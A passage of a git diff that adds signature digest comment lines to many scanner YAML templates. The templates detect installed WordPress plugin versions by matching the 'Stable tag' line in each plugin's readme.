4a0a00473045022100adfbd1042319bf7e36e8ab115658433e5261993f6e75c278fdfb494a0f4abd0502204fe822c9af51736e6b4af7969a790caffaa2dfbbf5e4f1575b9b4ca0a885d9ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 8c49a34259..5531a4300c 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ecc80d54aa830253c80546726a1332980982e66e42390a459b53fe3eda4f66bf02210083cf5dbff1250b0b4f51781932f6d7027eb0584a95e0e45e9abbf6e437a94909:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index c20ed6552a..5b5ff630c9 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022062069d2987933188de9a9a8e6455c4c5a60dc552fc7d7a4d3d34fc4c140cb22a02200ada083919532ffef289838de85d5ae015c8b309b78ac83cde6e7956cff0623a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 6ac2212b4b..6592014d32 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220049ffa6422cb891f764c0d52c44ae06270d3f8423fc4cc9e1d0bab8ff6fbf0f602200929e97825b287604485d930d0284c342c0fbdf90b7cd9c68fc41cfaf14c1e68:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 71c71b5ed1..e5be1ddefe 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206154dc3c6f92b239eed0b0701fd9e36e538f28a712793313f795f952cbb59b7a02200cffa7340cb1a3ff9f19d1afb76ec7e6704597b170f1245c86a2a2b7f3866778:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 7b47adc274..76509d5262 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100da8c9d1d7f88a7cdc23d2a4ea7cfd6ec0f2daa89d70a0086dfac8f447b7fa0a502201225bce939529ae9fe6392d6d9c2c68498c173e7399cc5ec08a38bb448d4aa34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 38391bd9f3..badff81381 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100abac73b2b0a0609c6bbb46c99f5c5cc0672c602ab0d143caae9b96a1786637a2022049b088fda427a142c764464895a1c4264a2e68bfcdeeab7243ed49272c6949ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index c4928059f6..3789d19638 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022048a44ef44cb17b1f67c1a381bc1d6a078107137fa6bb509973ab727a09047af802202d2d087dea6d8718312963cc72dd25cc24fe54a3b37c329b9ca7f4bf44cb6e4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index f6a7836f35..95be077f72 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022061dc49775c3b8d2de3fea0367332b3191fdb5a3fbb084ff61fa1cb9b9c4dcbc6022041dcf927d33e107d162176814d0d6bbaf00a7783d18badc6a159cb28a000e312:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index b7af708c4f..be1f124c70 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022077e2e87c8a0c122fb19371461a5ae673ab1fa7fa588781aaec0cdd1f8604eb1902210080784d8ff8fcb67b51ea4a3498557a7a1e3fa2fb3ba2c767e6fcf652168a5bf2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 61a793edf7..892ce5c1a0 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b69cb75e42c131a0cd68955e6ff5ce2953404091fb474980eda7bb54f5d56057022100c1eeab18f30a900eb5aa51c94a9c831474e668367eea47657f3d1efea1fd19c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 0da88d5d3f..be944dc8e2 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220628d97c8012917da8de04b68cb5bf2c2a3e6d531847c5ee8c0b3c14dc6fc1f31022019806cc37aabe5bac3bc4911330ad8aa0324ab3d23b3674aa7ba6808906e2fda:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 2b29428cf1..510e88fe83 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ec8393bd6dd7859c64d655368cc82bf45206aa7f2e5a7b3e1f149cc03ce1ff2a02207b988ccd613bafcae0b838e404be0d4ffe2029723a95e25013042c050acc4612:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 181e619a7c..97346129e6 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f796b8c4a66c15d61e009045fac4ac87d0d01b19515fcbc81fc9adf639e2391f022100d85dafb79777c35413110db2fd9bf406d2916b5c128a2e346a7bcdff39a09c4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8164eb4483..6c56c4bbd9 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cdec07242f7661a65262266e0d98e073935605b9a55c2a184912715cd9ef941e022100e004e264c724acdb520f70325089ece76595b6e97d69b9161bb42da43908e768:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 59554defdf..a23d8fbdb9 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207eb2d3842aebca462adc08f07b91f54fe2371760da90ec512f9a89997f4e2352022100a42d9e17c9a8112e707bbec3231c10cda860bbb4bc2b81685925b665ae6913d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 350fd9436b..310d8d2db2 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cb1702eb47a7f958c4975a672cbf0b8613b8df39cb71f5ba2590ea7fea7b5adf022100f08cb86e358445b18fa771f634e282b3b073887c84a01de4b877f6f82f163c0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 2ae6bafbba..02e202de6c 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b30cb1259de30e434b251c58f4ca59c997890b9cd1986f7bc3c879b5b411d708022041d2849f8f66bf1462d177e1742350c3c4b27972bc119cdc19b1e8e922307e1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d0dc8d92bb..f11d6ef0ea 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f0b64acc15c2f14ab89bd6a18e02bed0a9067208e6881b28f267980207d001eb02202aef7c0ea2409f232c762c536d1e9fbc81f4e9dec5f285f03b459a9b017d024c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index c49bbc2b6d..5a9714525d 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207069111ecb14d63216ee0d436215d010f37082c16fec6f0382501bdac69dedaa022100c02b701906eadd1f1b033b8b603eacc866079e678c3d5e6c54b5e7e33de93f24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 27586cbd9d..3cb7d07409 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ba250a087dc05645fcbd8eb9d0c79f0f83269c614ef7bc940d5c66f96606c37e022100a2c29b556f1a8fd784f2afa6fffefea68da93df58c391f256c6e4b7c406b42af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 946272f0a9..7e2a7634b7 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200ff868f8b0f9c872557ffe2afe34b495b495b4d22eb71eaeb313e1d9e500a1ac022100f13da99960d0f33b893a1609d3bb90268c80d5ae6ed63ad7e7d6e6525f93e021:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index aa29706872..f8e1551ddd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220647da1b00c7009de7827fa6ed33dc54aa826dc64cc1150e478dc7965e1538870022100bb14f58ca0c40789518009c84fd14d3fcf2dcd2f8c354ee6b793e04f445febc9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 290d53ab7e..f36ad26566 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202b33f35b433716d58583e72b9807ac12b2ee07228af9a317181130d527dc709e022100cc674cf026699d3ad0ad91965e6159ebbba314a20d9196d5210beaf4a12c5725:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index e83e8d79e7..77bcb11b82 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207787452bd296e61d18b42d3089fa9c1c81c5e107c5e77a84897d462f67a61a24022100ab4002acfa499c02c30ced6d788052214e50d63abab36733f2a78e1aad6b093d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index f1c16275a2..df801e6e6a 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203750fdbd98d62af6447e9204b3500f828f54620219f4ab1e13b09f398f7ee9e30220766c36fa21f156344ecfd333054b13bcaed2736319cf5f4a516e4f298dcc4079:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index fc072e19d8..818cb1083e 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f5c53eddaca98b364f36d91bb409740e9c5a4a0ce9486e0a20dbc1e8c0325f67022100d05b7dd0452a0559a02d371bf1d366f3fc85a23b6213ae1d310cf40b3c86e6dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index da9df0e8a5..4d0ce76387 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203239b8d133ecb24b145d2055a5bc71ff78a0c89607b5ad0763bfa63a09dfba26022100be5f754a6fd1507dbc274758aae97acd5ea22617889fb1a44dd7bb695842377d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index f8113d9750..3d11cd45be 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c3fba8973fd39cdcfb583b35e5f437874272f1f594be5ff967999db4fe80e46c0221009208070128ecd727d86409a72813b5dcd83da53028ba06f1a94f4ef39557d86d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 5f80282ab2..5d0f0d310f 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201e5413955244f81bacdfd9cba73bbcdea44522e99cee5373b6087144a6afe558022007db72e7c1da2a9469efaf15b23b0e0725a4ce8fb0850a0f305510d96e060ee5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 5725d5bb3f..232a2dadb8 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e3724cc06f369606d139aa86429e2bf9c15a4706d696a2b99653b76eb3ae1615022100a2fc893c95cee944ef8167bb499852f4dae242c5a3c17affc74084cae163efca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index f67a8bc18a..1e57ae35d4 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206098cfa3b2da69fbf9b44d2eabafbbcfb68ea1f53558921524a14befc6ad5b2902200a75bf26ac52ea3adb390c575367c404e8fa15347ce929aa1421b2dfd1f63e57:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index b9bd4be0a8..5a0ad10f59 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022036da6792e21b2ab3b5ca9da130dd9b237f66c8af35779dd18bea44fc09e5fff60220407549548a7dcda3f67cdf0be8b82c927fd2a906a7e02e4378833d0b3041a0e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index bece4ce486..e95bfb6367 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220648d8c91b08beb833db9ddf0db64d9238488a9c629662cd7725a341f937001df0220536d913f406673b8ba78954925a54381b10dc31f280a96f253b05c7f425f3edb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 138b0aa9a6..038655a822 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e2003464da67d48cdb6fb9721c0ff522b1accce0db70db48f8001c84dca059a1022100a5610b1dd7dbac013eebec31b818bd09e166ba75ee66d4e2233b03c0ce6fde84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 68bf71bc83..39f4690312 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bebdfb8eb748ae33df8b71e908b90e1bc639a9204f896be2bc5a53777de16221022025a26bd4b526971190253eb0539f9acd5d8b3b64174e9e15c86ae4fd3c95dcfd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 10dad2d2fb..3710192a55 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220404bd9eb167d4f95f616abff5db427ee638342b1b1dd283681376feffd3b10890221009b87a404190e63dd0574fdb472a00e4574dcb17ba72ba3d856aceb162592bcfc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index e9efe6fb53..2ed95a1869 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220137f19795c83b5d7cbb383bd45105bdfcd4421fd79d7a76c81d3375780a5e820022100ef1ae6acceb7310252f4304029364eebee893b0e57a24c1e8e7f8fd42691793f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index c3d10f0135..95e7da49e5 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201b2f7f46288a4c090346567ee75c76ecf476984cd74b3a15dea50b6e9411bdf202200d4551c9bd0ebc9ef955c655f8aee864fa411323aa9fcbaee44aad14e8fc985f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 4a8bc6b75c..6d72ef49db 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200483e574ab6cf2683ac3422c1dba850233f4ecf7581ccb4143d08b7750f6ac7002201e4eda6c21657b5f59a6518faa5f3c5f2e23cf07e61640113a6dda0a24ea5f38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index d2c74355bd..14f265331e 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207539a66d6e1238cd88af8144ff44058512ff89d9e05c123c104336c1cf172a00022100fd9fad5412d50531be3df6b751562dd1d18b2bd43ffbaf330ecf3788d28a3215:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 94b8494b08..fac4892ebb 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203b203365b6dfb46038491960e0781a8b4dc62d07da3bfe8e84039b1768ffa7120220299a23ae7729d037b9f5d1d5bc03e4d818a3b03c917c2f59c9aa8557b37a1f98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 108aba79e9..6b4e65f6a1 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c07863326aa916e73bedb2064b315acb5cdb6687abc75f687bdeba181509b83d022100bc7bb50684c6c0abda951faf689cfddcd9deb1e96ece56c0c0d1b6eb6270a0d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index f6f6bf5566..0ee284d075 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205babd3a8d55ce8ce73a34c1e0ccc3cdf56bb968c1820f51cf5a5313147ce61b3022100ac4b5107bd2261551f9577947d72eba04824ed80c2f61e843c7da99e29505fc9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 483cb7cac7..b396b33c61 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a76b60e193dfdd790aaa81dba716ae437aed776d737f3611c14ba514fbd43e39022100e38e5306935d73450e3cab853902f00981162adecda13558712f710b59800ae9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a132c98df4..6e93e702d7 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220218faf10b04b49ddc9dddbfb01b481f84b22777f50f38ad79b0aa952153f86490221009371dba2e2bea99f65b96b1cda3ddec120cc787b83e58b2b58d3ef537968772f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 135bbee046..89a94d77b7 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022021b97482d8580ae9b43c3b11c257aae3342215c736f345d25b9095cb589212c9022045ec8c82cd1bd783efdf66560071074ec38c247869aabe1436963bf11dd05071:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml 